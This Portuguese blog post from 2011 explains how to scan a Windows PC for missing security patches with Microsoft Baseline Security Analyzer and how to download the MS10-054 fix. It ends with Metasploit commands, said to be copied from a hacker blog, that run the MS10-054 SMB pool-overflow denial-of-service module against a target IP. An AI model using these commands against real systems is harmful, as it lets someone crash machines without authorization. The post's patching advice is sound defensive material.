Pesquisar este blog

quinta-feira, 3 de março de 2011

Como Verificar as Vulnerabilidades no seu Computador.


É muito importante você está atento, as vulnerabilidades do seu computador, a maioria das invasões aos computadores é pela falta de atualização do sistema operacional. Todo mês um Hacker descobre uma vulnerabilidade nova, para explorar, procurando dominar a sua maquina remotamente, através de exploits que exploram os Backdoor (também conhecido por Porta dos fundos) é uma falha de segurança que pode existir em um programa de computador ou sistema operacional, que deixa uma porta aberta para invasão.


Para encontrar as vulnerabilidades precisamos de uma ferramenta chamada Microsoft Baseline Security Analyzer 2.2, ferramenta gratuita que pode ser baixada no site da Microsoft, o link se encontra no final.

1. Passo - Depois de instalar a ferramenta, faça um escaneamento na sua maquina, clicando no link do sistema “Scan a computer”.




2. Passo – Selecione o nome do seu computador ou IP, se preferir selecione as opções, no meu caso todas estão marcadas e por fim click “Start Scan”, agora espere terminar o escaneamento, uma observação tem que está com a internet ligada, porque ele vai tentar atualizar o repositório, checando as atualizações.


 
3. Passo – Depois de realizar o escaneamento, vai mostrar um relatório, com todos os detalhes, clicando em “Result details”, mostrar detalhes das vulnerabilidades, como mostra a figura 4.



4. Passo – Ao clicar em Result Details na tela anterior, vai aparecer as vulnerabilidades abaixo, ao clicar na vulnerabilidade vai abrir o site da Microsoft.


 
5. Passo – No site da Microsoft você poderá ler detalhes da vulnerabilidade, sistemas que ela afeta, e clicar no link para baixar a correção.


 
6. Passo – Baixar a Correção da vulnerabilidade MS10-054.



A ferramenta é muito boa para analisar as vulnerabilidades do Sistema Operacional, também tem a opção de escanear vários computadores em rede, sendo necessário uma senha de Admistrador de Rede, é sempre bom prevenir futuros ataques a seu PC ou a sua Empresa, mostramos uma boa prática a ser adotada de prevenção de ataque.

Ferramenta que Explora as Vulnerabilidades:
http://www.metasploit.com/
Site do Microsoft Baseline Security Analyzer:
Download da Ferramenta que verifica a existência da Vulnerabilidade:


Exploração da Vulnerabilidade acima citada, tirada de um blog Hacker, só para mostrar a seriedade do problema, é 100% garantida a invasão sem a correção ou sem uma ferramenta de proteção.

With Command : 

Code:
msf > use auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow


[Image: d381yuc.jpg]


Code:
msf > set RHOST [target IP]


[Image: A5JUiuX.jpg]

Code:
msf > set SMBSHARE [The Name Of Folder Will You share]


[Image: wlUzVv0.jpg]

Code:
msf > exploit


[Image: t1j3trG.jpg]